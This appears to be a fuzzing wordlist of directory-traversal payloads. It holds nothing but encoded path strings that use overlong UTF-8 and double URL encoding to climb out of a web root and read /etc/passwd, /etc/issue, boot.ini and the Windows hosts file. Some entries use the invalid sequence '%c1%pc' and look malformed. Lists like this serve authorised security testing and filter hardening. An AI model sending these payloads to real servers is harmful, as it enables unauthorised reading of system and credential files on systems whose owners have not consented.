-%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cetc%255cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cetc%255cissue -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255c%f8%80%80%80%ae%f8%80%80%80%ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fetc%c0%2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fetc%c0%2fissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fetc%c0%2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fetc%c0%2fissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fetc%c0%2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fetc%c0%2fissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fetc%c0%2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fetc%c0%2fissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fetc%c0%2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fetc%c0%2fissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fetc%c0%2fpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fetc%c0%2fissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2f%f8%80%80%80%ae%f8%80%80%80%ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%afetc%c0%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%afetc%c0%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afetc%c0%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afetc%c0%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afetc%c0%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afetc%c0%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afetc%c0%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afetc%c0%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afetc%c0%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afetc%c0%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afetc%c0%afpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afetc%c0%afissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%af%f8%80%80%80%ae%f8%80%80%80%ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cetc%c0%5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cetc%c0%5cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cetc%c0%5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cetc%c0%5cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cetc%c0%5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cetc%c0%5cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cetc%c0%5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cetc%c0%5cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cetc%c0%5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cetc%c0%5cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cetc%c0%5cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cetc%c0%5cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5c%f8%80%80%80%ae%f8%80%80%80%ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cetc%c1%9cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cetc%c1%9cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cetc%c1%9cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cetc%c1%9cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cetc%c1%9cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cetc%c1%9cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cetc%c1%9cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cetc%c1%9cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cetc%c1%9cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cetc%c1%9cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cetc%c1%9cpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cetc%c1%9cissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9c%f8%80%80%80%ae%f8%80%80%80%ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcetc%c1%pcpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcetc%c1%pcissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcetc%c1%pcpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcetc%c1%pcissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcetc%c1%pcpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcetc%c1%pcissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcetc%c1%pcpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcetc%c1%pcissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcetc%c1%pcpasswd -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcetc%c1%pcissue -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcboot.ini -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pc%f8%80%80%80%ae%f8%80%80%80%ae%c1%pcetc%c1%pcpasswd 